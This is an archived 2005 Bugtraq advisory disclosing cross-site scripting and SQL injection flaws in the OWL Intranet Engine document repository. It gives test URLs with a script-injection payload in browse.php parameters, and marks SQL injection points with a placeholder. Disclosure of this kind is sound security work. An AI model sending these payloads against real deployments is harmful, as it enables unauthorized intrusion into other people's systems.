Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Various Vulnerabilities in OWL Intranet Engine

Various Vulnerabilities in OWL Intranet Engine

From: Joxean Koret <joxeankoret_at_yahoo.es>
Date: Sat, 01 Jan 2005 19:52:48 +0000

----------------------------------------------------------------------------
               Various Vulnerabilities in OWL Intranet Engine
----------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OWL 0.7 and 0.8 - Owl is a multi user document repository
(knowledgebase)
system written in PHP4 for publishing files/documents onto the web for
a
corporation, small business, group of people, or just for yourself.

Web : http://owl.sourceforge.net/

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerabilities

A1. In the script browser various parameters, that are used to write the
html code, not are verified.

        Test URLS :

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1'><script>alert(document.location)</script>&order=creatorid&sortposted=DESC

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1&order=creatorid'><script>alert(document.location)</script>&sortposted=DESC

B. SQL Injection Vulnerabilities

B1. In the browser.php script the following parameters are vulnerables
to an
SQL Injection attacks.

        Test URLS :
        

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104[SQL%20INJECTION]&expand=1&order=creatorid&sortposted=DESC

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104&expand=1&order=creatorid&sortposted=DESC[SQL%20INJECTION]

The fix:
~~~~~~~~

All problems are fixed in the CVS.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Received on Jan 02 2005
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]